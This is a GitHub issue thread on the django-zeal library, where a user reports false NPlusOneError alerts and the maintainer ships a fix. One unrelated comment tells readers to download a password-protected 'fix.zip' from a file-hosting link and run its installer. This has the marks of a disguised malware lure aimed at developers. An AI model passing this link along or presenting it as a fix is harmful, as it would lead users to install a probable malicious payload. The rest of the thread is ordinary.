### ISSUE TITLE
`NPlusOneError` popping even outside of context

### ISSUE THREAD

**Issue by serl** [taobojlen/django-zeal#19]
I'm trying to add `django-zeal` to a Django project and there are a lot of "false" positives I'd like to ignore.

In particular:
1. Adding the app `zeal` seems to activate the notifications everywhere already, I have most of my tests failing _before_ adding the middleware or wrapping the tests in `zeal_context`. I tried to use your pytest example to wrap everything in `zeal_ignore`, then re-adding `zeal_context` when I wanted zeal to work, but the ignores are preserved so that doesn't really do anything.
2. The tests mostly fail in the setup phase. I use [factory boy](https://factoryboy.readthedocs.io/en/stable/) and I have some complex factories that involve multiple models. So whenever I call the same factory twice, there's an error.

For me, `1` smells like a bug, and `2` can be a feature request. For example in my case I'd like to activate zeal everywhere but maybe don't take into account any call in the `tests` package (where the factories are), that is: add the possibility to ignore by "stack trace" and not only by model/field.

I can put together a little minimal test project if something is not clear.

Thanks!

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by taobojlen** [comment]
Thanks for the report! #1 is now fixed in zeal 1.4.0.

As for #2: I'd suggest using `zeal_ignore()` locally in the factory code!

**Comment by serl** [comment]
Hello, thanks for the fix!

For 2, I ended up just activating on the middleware, and there's already a lot of work to do 😁
